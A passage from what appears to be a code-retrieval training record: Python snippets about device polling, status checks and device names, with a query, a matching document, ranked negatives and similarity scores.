target[\"url\"])\n except RequestException as e:\n self.logger.error(e)\n except re.error as e:\n self.logger.error(e)\n break\n\n # Busy loop until next check_time\n while datetime.now() < next_check:\n sleep(1)", "def poll(self):\n now = time.time()\n if now > self._next_beat_t:\n self._next_beat_t = now + 60\n self.set_driver('ST', now, report=True)\n self.report_isycmd('DON')\n return True", "def status_task():\n props = [\n (STAT_TIME, current_time),\n (STAT_CONDITION, weather_condition)\n ]\n\n # Send the status request with the current time and condition.\n send_status_request(props)\n\n # Create and start a timer to repeat this task periodically.\n t = Timer(report_interval, status_task)\n t.setDaemon(True)\n t.start()", "async def get_status():", "def check(self):\n logging.info(\"rate limit remaining %s\" % self.remaining)\n while self.remaining <= 1:\n now = time.time()\n logging.debug(\"rate limit < 1, now=%s and reset=%s\", now,\n self.reset)\n if self.reset and now < self.reset:\n # padded with 5 seconds just to be on the safe side\n secs = self.reset - now + 5\n logging.info(\"sleeping %s seconds for rate limiting\" % secs)\n time.sleep(secs)\n else:\n # sleep a second before checking again for new rate limit\n time.sleep(1)\n # get the latest limit\n self.ping()\n self.remaining -= 1", "def poll_health():\n global timesCalled\n\n # Poll /health\n session = requests.Session()\n retry = Retry(connect=3, backoff_factor=0.5)\n adapter = HTTPAdapter(max_retries=retry)\n session.mount('http://', adapter)\n response = session.get(health_url)\n\n # Check HTTP status code\n status_code = response.status_code\n if status_code != status_ok:\n exit(1)\n\n # Get metrics values\n metrics = response.json()['metrics']\n requestLatencyValues.append(metrics['requestLatency'])\n dbLatencyValues.append(metrics['dbLatency'])\n cacheLatencyValues.append(metrics['cacheLatency'])\n\n # If 60 seconds has passed, send data to STDOUT\n timesCalled += 1\n if timesCalled == 6:\n output_data()\n\n timesCalled = 0\n requestLatencyValues.clear()\n dbLatencyValues.clear()\n cacheLatencyValues.clear()", "def _server_poll_expcompleted_(self):\n #print \"class Princeton_CCD function _server_poll_expcompleted_\" \n try:\n last_state = self.polled_running\n except (AttributeError,UnboundLocalError):\n self.polled_running = False\n last_state = False\n self.polled_running = self.query_running()\n if (not bool(last_state) and bool(self.polled_running)):\n self.begin_acq_time = time.time()\n #print self.query_running(), last_state\n #if ((last_state == True) and (self.polled_running == False)): CP\n if (bool(last_state) and not bool(self.polled_running)):\n self.end_acq_time = time.time()\n return True\n else:\n return False", "def refresh_status(self):\n status = self.cmodel.get_status()\n if status is not None:\n self.reg_status_pub.publish(status)\n\n with self.reg_status_cv:\n self.reg_status = status\n self.reg_status_cv.notify_all()\n\n if status.gFLT != 0 and not self.resetting:\n self.__log.info('RESETTING Robotiq {}'.format(self.name))\n self.reset_gripper()\n return status", "async def monitor():\n\n for n in range(6):\n await asyncio.sleep(2)\n print(\"monitor status:\", n, await ps.status())", "def toggle_polling(self):\n self.polling = not self.polling\n if not self.polling:\n # print('In toggle polling')\n self._stop_loop_feedback()\n self._start_loop_poll() if self.polling else self._stop_loop_poll()", "def __updateStreamStatus(self):\n while(True):\n for server,streams in self._streamsByServer.items():\n activeStreams = server.getActiveStreams()\n # Update each streams state\n for stream in streams:\n stream.lock.acquire()\n stream.setStreamState(server,Stream.STATE.DOWN)\n if (stream.name in activeStreams):\n stream.setStreamState(server,Stream.STATE.UP)\n stream.setStreamAddress(server,activeStreams[stream.name])\n stream.lock.release()\n time.sleep(StreamManager.SECS_BETWEEN_STATUS_CHECKS)", "def poll(until):\n\n start = time.time()\n\n while not until():\n time.sleep(0.5)\n cur = time.time()\n elapsed = int(round(cur - start))\n if int(elapsed) % 60 == 0:\n print('Waiting ({:0.2f} minutes)'.format(elapsed / 60.0))", "async def _async_status_request(self) -> None:\n try:\n # status_response = await self._hass.async_add_executor_job(\n # self._mc_status.status, self._MAX_RETRIES_STATUS\n # )\n if self.access_token:\n if (time.time() - self.last_request) > 1800:\n phantom = await self._hass.async_add_executor_job(\n self._phantom_load\n )\n if phantom.status_code == HTTP_OK:\n self.phantom_load = round(phantom.json().get(\"power\") / 1000, 3)\n else:\n _LOGGER.warning(phantom.content)\n\n # Got answer to request, update properties.\n live = await self._hass.async_add_executor_job(self._live_data)\n\n if live.status_code == HTTP_OK:\n self.power_usage = round(abs(live.json().get(\"power\")) / 1000, 3)\n else:\n _LOGGER.warning(live.content)\n\n self.last_request = time.time()\n self._last_status_request_failed = False\n except OSError as error:\n # No answer to request, set all properties to unknown.\n self.power_usage = None\n self.phantom_load = None\n\n # Inform user once about failed update if necessary.\n if not self._last_status_request_failed:\n _LOGGER.warning(\n \"Updating the properties of '%s' failed - OSError: %s\",\n self.unique_id,\n error,\n )\n self._last_status_request_failed = True", "def process_status_poll(self, status):\n self.log.debug('process-status-poll', status=status)\n\n if self._admin_state != AdminState.ENABLED:\n return\n\n # Get new/missing from the discovered ONU leaf. Stale ONUs from previous\n # configs are now cleaned up during h/w re-sync/reflow.\n\n new, rediscovered_onus = self._process_status_onu_discovered_list(status.discovered_onu)\n\n # Process newly discovered ONU list and rediscovered ONUs\n\n for serial_number in new | rediscovered_onus:\n reactor.callLater(0, self.add_onu, serial_number, status)\n\n # Process LOS list\n self._process_los_alarms(frozenset(status.ont_los))\n\n # Process ONU info. Note that newly added ONUs will not be processed\n # until the next pass\n\n self._update_onu_status(status.onus)", "def _update_status(self, new_status):\r\n old_status = self._status\r\n self._status = new_status\r\n for listener in self._listeners:\r\n # Calling user-defined callback.\r\n self._thread_pool.submit(\r\n listener.on_status_change(\r\n self, new_status.value, old_status.value))", "def poll(self):\n Monitor.poll(self)\n return deferToThread(self._poll)", "def waitStatus(j, wtype='Load'):\n timeout = 1\n curIter = 0\n maxIter = 60\n done = False\n while not done:\n stat = j.GetStatus(wtype)\n if stat == \"complete\":\n done = True\n else:\n curIter = curIter + 1\n if curIter > maxIter:\n raise ValueError(\"timeout waiting\")\n time.sleep(timeout)", "def _check_status(self):\n self.system_status_lock.acquire()\n info = self.system_status_proxy._getvalue()\n self.system_status_lock.release()\n return info", "def do_monitor(self):\n while not self.expired:\n self.expired = True\n time.sleep(self.interval)\n self.dead_fn()", "def online_check(self):\n self.online = False\n online_topic = '{t_topic}/INFO2'.format(**self)\n print('{BLUE}Watching for {}{NOCOLOR}'.format(online_topic, **colors))\n self.mqtt.connect(self.mqtt_host)\n self.mqtt.message_callback_add(online_topic, lambda *args: setattr(self, 'online', True))\n self.mqtt.subscribe(online_topic)\n starttime = datetime.datetime.now()\n while self.online == False and (datetime.datetime.now() - starttime).total_seconds() < wait_time:\n self.mqtt.loop(timeout=loop_time)\n time_waited = (datetime.datetime.now() - starttime).total_seconds()\n if self.online == False:\n print('{RED}{f_name} did not come online within {wait_time} '\n 'seconds{NOCOLOR}'.format(f_name=self.f_name, wait_time=str(wait_time), **colors))\n elif self.online == True:\n print('{GREEN}{f_name} came online in {time_waited} '\n 'seconds{NOCOLOR}'.format(f_name=self.f_name, time_waited=time_waited, **colors))\n self.mqtt.unsubscribe(online_topic)\n self.mqtt.message_callback_remove(online_topic)\n self.mqtt.disconnect()", "def update_status(self):\n if self.pwm:\n if self.state == GPIO.HIGH:\n thread = threading.Thread(target=self._pwm_on, args=())\n thread.start()\n elif self.state == GPIO.LOW:\n thread = threading.Thread(target=self._pwm_off, args=())\n thread.start()\n else:\n GPIO.output(self.id_, self.state)\n\n return self.get_status()", "def poll_device(self):\n #self.logger.info(\"poll_device: Checking online status\")\n for tasmota_topic in self.tasmota_devices:\n if self.tasmota_devices[tasmota_topic].get('online', None) is not None:\n if self.tasmota_devices[tasmota_topic]['online_timeout'] < datetime.now():\n self.tasmota_devices[tasmota_topic]['online'] = False\n self.set_item_value(tasmota_topic, 'item_online', False, 'poll_device')\n self.logger.info(f\"poll_device: {tasmota_topic} is not online any more - online_timeout={self.tasmota_devices[tasmota_topic]['online_timeout']}, now={datetime.now()}\")", "def get_status_change(self):\n if self.sync:\n raise EvseError\n else:\n self.s.timeout = STATUS_SERIAL_TIMEOUT\n try:\n # Wait to have read all status changes, only return the last one\n while True:\n self._get_response()\n except EvseTimeoutError:\n pass\n self.s.timeout = STANDARD_SERIAL_TIMEOUT\n # In fact, the callback is called by get_response...\n # Here we only deal with the value of self.\n status = self.new_status\n self.new_status = None\n return status", "def wait_until_idle(self):\n while True:\n time.sleep(self.__interface.WT_STATE_LOOKUP)\n\n if not self.is_busy:\n break", "def test_poll(self):\n ret = poll.poll(self.args)\n self.assertEqual(ret, poll.NOERROR)", "def update_ticker(self):\n while True:\n Thread(target=self.update_data_check).start()\n time.sleep(60)", "async def _poll(self):\n while True:\n await asyncio.sleep(self._poll_period)\n weight = self.weight\n message = Message(payload=cbor2.dumps(weight), code=CONTENT, content_format=60)\n self.updated_state(message)" ]
[ "0.7244833", "0.6906433", "0.6889742", "0.6884497", "0.68633866", "0.68633866", "0.68633866", "0.68633866", "0.68633866", "0.68633866", "0.68633866", "0.68633866", "0.68633866", "0.68633866", "0.68633866", "0.68633866", "0.68633866", "0.68633866", "0.68633866", "0.68553823", "0.6825127", "0.68249416", "0.68163466", "0.67354786", "0.67165923", "0.6712912", "0.6703656", "0.6651261", "0.66333985", "0.6596781", "0.6525885", "0.6522338", "0.6515367", "0.6515367", "0.6515367", "0.64960384", "0.648296", "0.6465489", "0.6413869", "0.64119977", "0.640905", "0.63898975", "0.63898975", "0.63898975", "0.63898975", "0.63898975", "0.63898975", "0.63898975", "0.63620263", "0.6342184", "0.6336024", "0.6335791", "0.6318878", "0.631398", "0.63084966", "0.63032377", "0.6292084", "0.62778795", "0.62539387", "0.62455857", "0.6241496", "0.62223995", "0.6216566", "0.620509", "0.619756", "0.6192683", "0.6181867", "0.6153506", "0.6136822", "0.61271966", "0.6121346", "0.61100066", "0.61060673", "0.6097237", "0.60897446", "0.6089131", "0.6076079", "0.60743034", "0.60604584", "0.60502476" ]
0.66181207
49
Return the name of the device if any.
def name(self): return self._name
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def device_name(self) -> Optional[str]:\n return pulumi.get(self, \"device_name\")", "def device_name(self) -> Optional[str]:\n return pulumi.get(self, \"device_name\")", "def name(self):\n return self._device.name", "def name(self):\n return self._device.name", "def name(self):\n return self._device.name", "def get_device_name(self):\n name = self._device[\"name\"]\n if not name or name == \"--\":\n name = self._mac\n\n return name", "def name(self):\n return self.device.name()", "def name(self):\n return self.device.device_data[self.device_id]['name']", "def device_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"device_name\")", "def device_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"device_name\")", "def get_device_name(self, device: str) -> str | None:\n raise NotImplementedError()", "def name(self) -> str:\n return self._device.name or self._device.mac", "def name(self):\n return f\"{get_device_name(self._data, 0, self._name)}\"", "def getDeviceName(self):\n name = str(nvmlDeviceGetName(self.handle))\n return name", "def name(self):\n return self._device.device_data[self._uuid]['name']", "def _get_device_name(self, device_id: str) -> str | None:\n if device := self.get_device(device_id):\n return device.device_name\n return None", "def name(self):\n return self._device.description_pretty()", "def name(self):\n if self._connection.location_names:\n return '{} {} {}'.format(self._device.location2, self._device.location, self._device.name)\n else:\n return self._device.name", "def name(self) -> str:\n return self.camera_info[\"device_name\"]", "def get_device(self) -> str:\n pass", "async def async_get_device_name(self, device):\n if device not in self.last_results:\n return None\n return self.last_results[device].name", "def get_device_name(self, identity, device):\n device_info = self._get_device(identity, device)\n return device_info.get('Name', identity)", "def get_device_name(self, device):\n if not self.last_results:\n return None\n for client in self.last_results:\n if client[\"mac\"] == device:\n return client[\"hostname\"]\n return None", "def get_device_name(self, device):\n if not self.last_results:\n return None\n for client in self.last_results:\n if client.mac == device:\n return client.name\n return None", "def _get_device_name(self, device_id):\n if self._locks_by_id.get(device_id):\n return self._locks_by_id[device_id].device_name\n if self._doorbells_by_id.get(device_id):\n return self._doorbells_by_id[device_id].device_name", "def name(self):\n return self._get_device_class_name()", "def get_device_name(self, device):\n with self.lock:\n # If not initialised and not already scanned and not found.\n if device not in self.hostname_cache:\n self.get_ddwrt_data()\n\n return self.hostname_cache.get(device, False)", "def name(self) -> str:\n return self.profile_device.name", "def retrieve_device_name(self, device_id):\n if device_id is None:\n self.log_error(MongoDatabase.retrieve_device_name.__name__ + \"Unexpected empty object: device_id\")\n return None\n\n try:\n device = self.devices_collection.find_one({\"device_id\": device_id})\n if device is not None:\n return device['name']\n except:\n traceback.print_exc(file=sys.stdout)\n self.log_error(sys.exc_info()[0])\n return None", "def name(self):\n return self.devname", "def find_iio_device_name(self):\n self.iio_device_dir()\n self.console.runcmd(f\"cat name\", expected=\"\\r\\n\")\n iio_device_name = self.console.output()\n return iio_device_name", "def get_dev_name(self):\n\t\treturn call_sdk_function('PrlSrvCfgHdd_GetDevName', self.handle)", "def getParentDeviceName(self):\n name = \"\"\n dev = self.device()\n if dev: name = dev.getDeviceName()\n return name", "def device(self) -> str:\n return self._device", "def name(self):\n _LOGGER.debug(self._shelly_cloud_device_name + ' >>> ' +\n self._shelly_cloud_entity_name + ' >>> name() >>> ' +\n self._shelly_cloud_device_name)\n return self._shelly_cloud_device_name", "def name(self):\n return f\"{self.device_name} {self.device_variable}\"", "def name(self) -> str:\n return self.config_name or self.host_name or self.dev_id or DEVICE_DEFAULT_NAME", "def _get_device_name(auth_header, user, device_id, async_kvstore_client, request_context):\n\n response = yield async_kvstore_client.async_kvstore_get_request(\n constants.REGISTERED_DEVICES_COLLECTION_NAME, auth_header=auth_header, owner=user)\n\n if response.code == http.OK:\n response_json = yield response.json()\n\n for device in response_json:\n if device[\"device_id\"] == device_id:\n defer.returnValue(device[\"device_name\"])\n\n LOGGER.error(\"Unable to fetch friendly name for device={}, code={}\".format(device_id, response.code))\n defer.returnValue(\"\")", "def device_get_name(pnd):\n return _nfc.device_get_name(pnd)", "def device_object_name(self):\n try:\n return self.get_property(gdef.SPDRP_PHYSICAL_DEVICE_OBJECT_NAME)\n except WindowsError as e:\n if e.winerror not in (gdef.ERROR_INVALID_DATA, gdef.ERROR_NO_SUCH_DEVINST):\n raise", "def name(self):\n return self._meural_device[\"alias\"]", "def name(self):\n # self._name = \"wyzeapi_\"+self._device_mac+\"_\"+ self._name\n return self._device.nickname", "def core_device_thing_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"core_device_thing_name\")", "def name(self):\n return self.device.device_data[self.device_id]['name'] + \\\n f' {self._sensor_type}'", "def kdev_name(self):\n return self._sysfs", "def name(self):\n return '{} {}'.format(self._device,\n self._endpoint)", "def get_name(self):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)", "async def get_hostname(self):\n\n # Display info message\n log.info(\"get_hostname\")\n\n # Get hostname\n output = await self.send_command(self.cmd_get_hostname)\n\n # Display info message\n log.info(f\"get_hostname: output: '{output}'\")\n\n # Remove the useless information in the returned string\n output = output.split(\"System Name: \")[1].strip()\n\n # Display info message\n log.info(f\"get_hostname: hostname found: '{output}'\")\n\n # Return the name of the device\n return output", "def dm_name(self):\n if self._dm_name is not None:\n return self._dm_name\n if not self.exists:\n return None\n if not os.path.exists(self.sysfs_dm_name_file):\n return None\n self.retr_dm_name()\n return self._dm_name", "def device(self):\n return self._vars[0].device", "def testCheckDeviceName(self):\n device = config.devices[self.driver.desired_capabilities.get(\"deviceName\")][\"name\"]\n print(\"Device : \", device)", "async def get_hostname(self):\n\n # Display info message\n log.info(\"get_hostname\")\n\n # Get hostname\n output = await self.send_command(self.cmd_get_hostname)\n\n # Display info message\n log.info(f\"get_hostname: output: '{output}'\")\n\n # Remove the useless information in the returned string\n output = output.split()[0]\n\n # Display info message\n log.info(f\"get_hostname: hostname found: '{output}'\")\n\n # Return the name of the device\n return output", "def get_char_name(self):\n return self._character_device_path.split('/')[-1]", "def name(self) -> str:\n return self.dev.label", "def __get_device_type_name(self, mps_db_session, device_type_id):\n device_type = mps_db_session.query(models.DeviceType).filter(models.DeviceType.id==device_type_id).all()\n\n if len(device_type) == 1:\n return device_type[0].name\n elif len(device_type) == 0:\n raise ValueError(\"Function \\\"__get_device_type_name(device_type_id={}). Not fault was found.\\\"\"\n .format(device_type_id))\n else:\n raise ValueError(\"Function \\\"__get_device_type_name(device_type_id={}). More than one device matches.\\\"\"\n .format(device_type_id))", "def GetDeviceTypeName(self):\n if self._device_type_name is None:\n self._device_type_name = self.LsbReleaseValue(\n key='DEVICETYPE', default='CHROMEBOOK')\n return self._device_type_name", "def name(self):\n if self._slave_mode:\n for dev in self._multiroom_group:\n for device in self.hass.data[DOMAIN].entities:\n if device._is_master:\n return self._name + ' [' + device._name + ']'\n else:\n return self._name\n return self._name", "def __str__(self):\n return \"Device %d\" % self.device_id", "def dev_name_prefix(self):\n match = self._name_re.match(self.dev_name)\n if not match:\n raise InvalidDeviceNameError(\"Not a valid device name: '%s'\" %\n self.dev_name)\n\n return match.group(1)", "def device_info(devid: int = 0) -> str: # pragma: no cover\n numdev = jax.device_count()\n if devid >= numdev:\n raise RuntimeError(f\"Requested information for device {devid} but only {numdev} present.\")\n dev = jax.devices()[devid]\n if dev.platform == \"cpu\":\n info = \"CPU\"\n else:\n info = f\"{dev.platform.upper()} ({dev.device_kind})\"\n return info", "def device():\n return G.DEVICE", "def name(self):\n return f\"{self.sensor_type['name']} ({self._mac[-5:]})\"", "async def async_get_device_name(self, device: str) -> str | None:\n assert (\n self.hass is not None\n ), \"hass should be set by async_setup_scanner_platform\"\n return await self.hass.async_add_executor_job(self.get_device_name, device)", "def name(self):\n return self._sensor.name", "def device_num(self) -> str:\n return pulumi.get(self, \"device_num\")", "def device() -> str:\n import torch\n\n if torch.cuda.is_available() and torch.cuda.device_count() > 0:\n if hasattr(Config().trainer,\n 'parallelized') and Config().trainer.parallelized:\n device = 'cuda'\n else:\n device = 'cuda:' + str(\n random.randint(0,\n torch.cuda.device_count() - 1))\n else:\n device = 'cpu'\n\n return device", "def get_sensor_name(self):\n return self.data[1]", "def no_device(self) -> Optional[str]:\n return pulumi.get(self, \"no_device\")", "def no_device(self) -> Optional[str]:\n return pulumi.get(self, \"no_device\")", "def device_id(self) -> Optional[str]:\n return self.relay(\"device_id\")", "def sysfs_dm_name_file(self):\n if not self.sysfs_dm_dir:\n return None\n return os.path.join(self.sysfs_dm_dir, 'name')", "def group_name(self):\n return \"device-%s\" % self.id", "def device(self):\n hw = self.hw()\n if hw: return hw.device()", "def name(self) -> str:\n return f\"{self.platform_name} {self._sensor_name}\"", "def get_device(arn=None):\n pass", "def getParentDeviceTitle(self):\n title = \"\"\n dev = self.device()\n if dev: title = dev.titleOrId()\n return title", "def get_hostname(self):\n return self.mycam.devicemgmt.GetHostname()", "def name(self):\n return 'Connected Devices'", "def get_device_id(self) -> str:\n return Config.get('device_id')", "def get_name(self):\n\t\treturn call_sdk_function('PrlSrvCfgDev_GetName', self.handle)", "def generate_device_name(device, description): \n datacenter = 'SYD' \n devices = {'firewall': 'Cisco_MX', 'wireless': 'Cisco_MR'} \n\n type = devices[device] \n name = f\"{type}--{description}__{datacenter}\" \n \n return name", "def dev_name(self):\n if not self.is_rule:\n raise NotRuleError(\"No 'NAME' field.\")\n\n return self._fields[\"NAME\"]", "def retr_dm_name(self):\n\n if not self.name:\n msg = _(\n \"Cannot retrieve dm_name file, \"\n \"because it's an unnamed devicemapper device object.\")\n raise DmDeviceError(msg)\n\n if not self.exists:\n msg = _(\n \"Cannot retrieve dm_name file of %r, \"\n \"because the devicemapper device doesn't exists.\") % (\n self.name)\n raise DmDeviceError(msg)\n\n r_file = self.sysfs_dm_name_file\n if not os.path.exists(r_file):\n msg = _(\n \"Cannot retrieve dm_name file of %(bd)r, \"\n \"because the file %(file)r doesn't exists.\") % {\n 'bd': self.name, 'file': r_file}\n raise DmDeviceError(msg)\n\n if not os.access(r_file, os.R_OK):\n msg = _(\n \"Cannot retrieve dm_name file of %(bd)r, \"\n \"because no read access to %(file)r.\") % {\n 'bd': self.name, 'file': r_file}\n raise DmDeviceError(msg)\n\n f_content = self.read_file(r_file, quiet=True).strip()\n if not f_content:\n msg = _(\n \"Cannot retrieve dm_name file of %(bd)r, \"\n \"because file %(file)r has no content.\") % {\n 'bd': self.name, 'file': r_file}\n raise DmDeviceError(msg)\n\n self._dm_name = f_content", "def device_id(self) -> str:\n return self._device_info[\"ID\"]", "def vendor_name(self):\n return self._device.vendor", "def get_device(self):\n return self.parent.get_device()", "def device_type(self):\n return Context.devtype2str[self.device_typeid]", "def device_type(self):\n return Context.devtype2str[self.device_typeid]", "def device(self):\n return next(self.parameters()).device", "def device(self):\n return next(self.parameters()).device", "def device(self):\n return next(self.parameters()).device", "def device(self):\n return next(self.parameters()).device", "def device(self):\n return next(self.parameters()).device", "def test_device_states_device_name_get(self):\n pass", "def get_name(self):\n return self.nvPublic.get_name()", "def device_provisioning_host_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"device_provisioning_host_name\")", "def device(self):\n return self._device", "def device_provisioning_host_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"device_provisioning_host_name\")", "def generate_device_name(device, description):\n datacenter = 'RTP'\n devices = {'firewall': 'Cisco_ASAv', 'router': 'Cisco_Cat-8k'}\n\n device_type = devices[device]\n name = f\"{device_type}--{description}__{datacenter}\"\n\n return name", "def get_device(self):\n raise NotImplementedError()", "def get_name(cls):\n return DRIVER_NAME" ]
[ "0.89734465", "0.89734465", "0.8584627", "0.8584627", "0.8584627", "0.8502048", "0.84944665", "0.84194607", "0.83955586", "0.83955586", "0.8379756", "0.83165", "0.8306566", "0.8161454", "0.81564134", "0.8090303", "0.8087526", "0.8073198", "0.8006941", "0.7999654", "0.79544145", "0.7942609", "0.79231834", "0.79003376", "0.7892853", "0.78887457", "0.7885869", "0.77037406", "0.7679084", "0.76708424", "0.76574874", "0.7591413", "0.75360775", "0.752754", "0.7503572", "0.740907", "0.7405346", "0.73706686", "0.7363064", "0.7360331", "0.73424125", "0.7284668", "0.718853", "0.7185505", "0.71458435", "0.7078036", "0.70713276", "0.70563745", "0.7038886", "0.70158154", "0.70148325", "0.698652", "0.69633955", "0.6946806", "0.688068", "0.6880524", "0.6879555", "0.6842212", "0.683373", "0.68165874", "0.6794383", "0.6794009", "0.6740635", "0.6730933", "0.6712652", "0.66963136", "0.668313", "0.6671994", "0.6671994", "0.6669045", "0.6656662", "0.6655738", "0.6651435", "0.6644615", "0.6642231", "0.66355723", "0.6623369", "0.66176414", "0.66060066", "0.6596274", "0.6578622", "0.6560098", "0.6559068", "0.65411913", "0.65277195", "0.6515479", "0.6484918", "0.6484918", "0.64680797", "0.64680797", "0.64680797", "0.64680797", "0.64680797", "0.64609236", "0.64493054", "0.64416623", "0.64343995", "0.640955", "0.6405033", "0.6400574", "0.6396757" ]
0.0
-1
Return true if device is on.
def is_on(self): camera = self.coordinator.data[self._camera_id] if self._switch_type == "record_motion": enabled = True if camera["recording_mode"] == TYPE_RECORD_MOTION else False elif self._switch_type == "record_always": enabled = True if camera["recording_mode"] == TYPE_RECORD_ALLWAYS else False else: enabled = True if camera["ir_mode"] == self._ir_on_cmd else False return enabled
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_on(self) -> bool:\n return self._device.is_on", "def is_on(self):\n return self._device.is_on", "def is_on(self):\n return self._device.is_on", "def is_on(self):\n return self._device.is_on", "def is_on(self):\n return self._device.state", "def is_on(self) -> bool:\n raise NotImplementedError(\"Device subclass needs to implement this.\")", "def _is_device_active(self):\n return self.power_mode == STATE_ON", "def is_on(self) -> bool:\n return self.tuya_device.status.get(DPCODE_SWITCH, False)", "def is_on(self) -> bool:\n return self._device.fan_on", "def is_on(self) -> bool:\n return self.entity_description.get_ufp_value(self.device) is True", "def is_on(self) -> bool:\n return self.entity_description.get_ufp_value(self.device) is True", "def is_on(self):\n return bool(self._insteon_device_group.value)", "def is_on(self):\n return self._device.state == SHCShutterContact.ShutterContactService.State.OPEN", "def is_on(self):\n return True if self._device.device_data[self._uuid]['streaming_state'] == \\\n 'streaming-enabled' or \\\n self._device.device_data[self._uuid]['streaming_state'] == \\\n 'online-disabled' else False", "def is_on(self) -> bool:\n return self.coordinator.data.get_metric(METRIC_KEY_MODE) == MODE_ON", "def device_is_configured(self):\n\n\t\ttry:\n\t\t\t_ = self._dev\n\t\texcept:\n\t\t\treturn False\n\n\t\treturn True", "def is_on(self):\n return self._controller.is_on", "def is_on(self) -> bool:\n return self._state == STATE_ON", "def is_on(self) -> bool:\n return self._is_on", "async def connected(self) -> bool:\n args = ['-t', f\"DEVICE INFO,{self.conf['device_address']}\"]\n output = await self.run_vh(args)\n return \"IN USE BY: NO ONE\" not in output", "def is_on(self):\n return self._sensor_state()", "def is_on(self):\n return getattr(self._node, STICK_API[USB_MOTION_ID][ATTR_STATE])", "def is_on(self):\n return self._program.get(\"enabled\") is True", "def is_on(self):\n return self._device.car_state.get(self._key)", "def is_on(self):\n if self._power_state == HYSEN_POWERON :\n return True\n else:\n return False", "def is_on(self):\n return getattr(self.coordinator.data[0], self._sensor) is True", "def check_connectivity(self):\n r = self.run_cmd(\"get-state\")\n return r.startswith(\"device\")", "def available(self) -> bool:\n return self._device.is_connected", "def is_on(self):\n return self._state == STATE_ON", "def is_on(self):\n return self._state == STATE_ON", "def is_on(self):\n return self._state == STATE_ON", "def is_on(self):\n return self._state == STATE_ON", "def is_on(self):\n return self._state == STATE_ON", "def is_on(self) -> bool:\n return self._state", "def is_on(self):\n return self._on", "def is_on(self) -> bool:\n return bool(self._state)", "def is_on(self) -> bool:\n return self._client.get_circ_pump()", "def is_connected(self):\n return self.hw_connected", "def is_on(self):\n return self._poe_data.ports[self._port]['state'] == STATE_ON", "def is_on(self):\n return self._is_on", "def is_on(self):\n return self._is_on", "def is_on(self):\n return self._is_on", "def is_on(self):\n return self._is_on", "def is_on(self):\n return self._is_on", "def is_on(self):\n return self._is_on", "def is_on(self):\n return self._is_on", "def is_on(self):\n return self._is_on", "def is_on(self):\n return self._is_on", "def is_on(self):\n return self._is_on", "def is_on(self):\n return self._is_on", "def is_host_on(self):\n status = False\n cmd = \"/usr/local/bin/wedge_power.sh status\"\n data = run_shell_cmd(cmd)\n Logger.info(\"[FSCD Testing] Executing cmd= [{}]\".format(cmd))\n Logger.info(\"[FSCD Testing] Received data= [{}]\".format(data))\n if \"on\" in data:\n status = True\n Logger.info(\"[FSCD Testing] userver power status {}\".format(status))\n return status", "def available(self) -> bool:\n return self._device.is_online", "def is_on(self):\n pass", "def is_on(self) -> bool | None:\n return self._state", "def check_device_state(self):", "def is_on(self):\n data = self.sensor_data\n if data and data[\"model\"] == \"SML\" and data[\"changed\"]:\n return data[\"state\"] == STATE_ON\n return False", "def is_on(self) -> bool:\n if self._state == STATE_UNKNOWN:\n return False\n return bool(self._state)", "def is_on(self):\n if self._sensor_type != DEVICE_TYPE_DOORBELL:\n return self._camera_data[\"event_on\"]\n return self._camera_data[\"event_ring_on\"]", "def is_on(self):\n return bool(self._state)", "def is_on(self):\n return bool(self._state)", "def is_on(self):\n return self._get_state() == ServerState.ON", "def is_on(self):\n return False", "def is_on(self):\n return bool(self.arest.data.get('state'))", "def is_on(self):\n return self.wink.state()", "def is_on(self):\n return self.device.override_time != 0", "def is_on(self) -> bool:\n return self._smart_system.is_ws_connected", "def available(self):\n return True if self._device.status == \"AVAILABLE\" else False", "def is_on(self) -> bool:\n return self._state == \"yes\"", "def is_on(self):\n ret_val = self._get_switch_state()\n if ret_val is None:\n return False\n if isinstance(ret_val, bool):\n return ret_val\n if ret_val == STATE_ON:\n return True\n state = STATE_LOOKUP.get(ret_val, STATE_OFF)\n return state == STATE_ON", "def is_connected(self) -> bool:\n return self.arduino is not None", "def is_on(self):\n return self._client.get_power()", "def is_on(self):\n return self._light_on", "def is_on(self):\n return self.car.data[DATA_PLUGGED_IN]", "def is_on(self):\n return bool(self.enabled)", "def is_on(self):\n return not self.ready", "def on(self) -> bool:\n on_cmd = HomeAssistantPlugin.service_map[self.domain.lower()][\"on\"]\n return self.send(on_cmd)", "def is_device_connected(device_id):\n try:\n device_name = subprocess.check_output([ADB_EXECUTOR, '-s', device_id, 'shell', 'getprop', 'ro.product.model'])\n device_name = device_name.decode(DEFAULT_CHARSET).replace('\\n', '').replace('\\r', '')\n logger.info('device {} online'.format(device_name))\n except subprocess.CalledProcessError:\n return False\n return True", "def on(self):\n status = self.dev.ctrl_transfer(0x40, 0x01, 0x0001, 0xa0, [])\n if status == 0:\n self.ev.set()\n return (status == 0)", "def is_on(self):\n return self._data[\"enabled\"]", "def is_on(self):\n return self._state", "def is_on(self):\n return self._state", "def is_on(self):\n return self._state", "def is_on(self):\n return self._state", "def is_on(self):\n return self._state", "def is_on(self):\n return self._state", "def is_on(self):\n return self._state", "def is_on(self):\n return self._state", "def is_on(self):\n return self._state", "def is_on(self):\n return self._state", "def is_on(self):\n return self._state", "def is_on(self):\n return self._state", "def is_on(self):\n return self._state", "def is_connected(self):\n\t\treturn bool(call_sdk_function('PrlVmDev_IsConnected', self.handle))", "def is_on(self):\n return self._mower_status in [\n STATUS_EXECUTING_START, STATUS_OK_CHARGING,\n STATUS_OK_CUTTING, STATUS_OK_LEAVING, STATUS_OK_SEARCHING, STATUS_OK_CUTTING_MANUAL]", "def is_on(self):\n return (\n self._device.batterylevel != SHCBatteryDevice.BatteryLevelService.State.OK\n )", "def is_online(self, device):\n # TODO: Add info for the device if it is actually ONLINE\n return device in self.backends", "def is_on(self) -> bool:\n return self._current_speed != SPEED_OFF", "def is_on(self):\n\n return self._state", "def is_on(self):\n request = requests.get(self._resource+\"/state\", timeout=10)\n \n try:\n if int(float(request.text)) > 0:\n self._state = True\n else:\n self._state = False\n \n except:\n self._state = None\n \n return self._state", "def is_on(self):\n return self._brightness != 0", "def is_on(self):\n return self.car.data[DATA_CHARGING]" ]
